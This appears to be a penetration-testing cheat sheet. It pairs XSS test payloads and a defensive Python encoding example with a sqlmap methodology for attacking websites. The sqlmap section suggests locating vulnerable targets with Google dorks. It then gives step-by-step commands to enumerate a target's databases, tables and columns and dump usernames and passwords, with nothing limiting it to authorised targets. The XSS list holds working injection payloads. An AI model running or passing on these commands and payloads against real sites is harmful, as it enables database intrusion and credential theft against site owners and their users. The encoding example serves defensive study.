XSS


Test cases:

  • >"'><script>alert('XSS')</script>
  • >%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>
  • AK%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OS%22
  • %22%2Balert(%27XSS%27)%2B%22
  • <table background="javascript:alert(([code])"></table>
  • <object type=text/html data="javascript:alert(([code]);"></object>
  • <body onload="javascript:alert(([code])"></body>
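
The test cases above aim at different output contexts: HTML body text, a quoted attribute value, a JavaScript string, and a javascript: URL in an attribute. The following Python code is an added example, not part of the original page, showing the context-specific encoding that neutralises them. The function names are hypothetical, and it assumes the application reflects the parameter after URL decoding.

```python
import html
import json
from urllib.parse import unquote, urlsplit

# Test cases copied from the list above, quotes normalised to ASCII.
TEST_CASES = [
    ">\"'><script>alert('XSS')</script>",
    ">%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>",
    "AK%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OS%22",
    "%22%2Balert(%27XSS%27)%2B%22",
]

def encode_html(value):
    """For HTML body text and quoted attribute values."""
    return html.escape(value, quote=True)

def encode_js_string(value):
    """JavaScript string literal that is safe inside an inline <script>."""
    inner = json.dumps(value)[1:-1].replace('\\"', '\\u0022')
    for ch in "<>&'":
        inner = inner.replace(ch, "\\u%04x" % ord(ch))
    return '"' + inner + '"'

def safe_url(value):
    """For href/src/data/background: allow only http(s) or relative URLs."""
    # Drop whitespace and control characters before reading the scheme.
    compact = "".join(c for c in value if c > " ")
    scheme = urlsplit(compact).scheme.lower()
    return value if scheme in ("", "http", "https") else "#"

def survives_encoding(raw):
    """True if the decoded test case cannot break out of either context."""
    value = unquote(raw)  # what the application sees after URL decoding
    as_html, as_js = encode_html(value), encode_js_string(value)
    html_ok = not any(c in as_html for c in "<>\"'")
    js_ok = (not any(c in as_js[1:-1] for c in "<>\"'")
             and json.loads(as_js) == value)
    return html_ok and js_ok

if __name__ == "__main__":
    for case in TEST_CASES:
        print(survives_encoding(case), encode_html(unquote(case)))
    print(safe_url("javascript:alert('XSS')"), safe_url("/img/bg.png"))
```

HTML encoding alone does not stop the javascript: cases when the value is used as a URL attribute, which is why safe_url checks the scheme separately.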

SQLmap


Install

git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

SQLmap methodology
1. Check whether the target website is vulnerable to SQL injection
Use Google dorks (http://www.exploit-db.com/google-dorks/) and/or a web application scanner.

2. List databases
sqlmap -u http://[Target Website]/…php?id=7 --dbs

3. List tables
sqlmap -u http://[Target Website]/…php?id=7 -D [Target Website] --tables

4. List columns
sqlmap -u http://[Target Website]/…php?id=7 -D [Target Website] -T [Target Table_user_info] --columns

5. List usernames
sqlmap -u http://[Target Website]/…php?id=7 -D [Target Website] -T [Target Table_user_info] -C [user_names_column] --dump

6. Extract password
sqlmap -u http://[Target Website]/…php?id=7 -D [Target Website] -T [Target Table_user_info] -C [user_password_column] --dump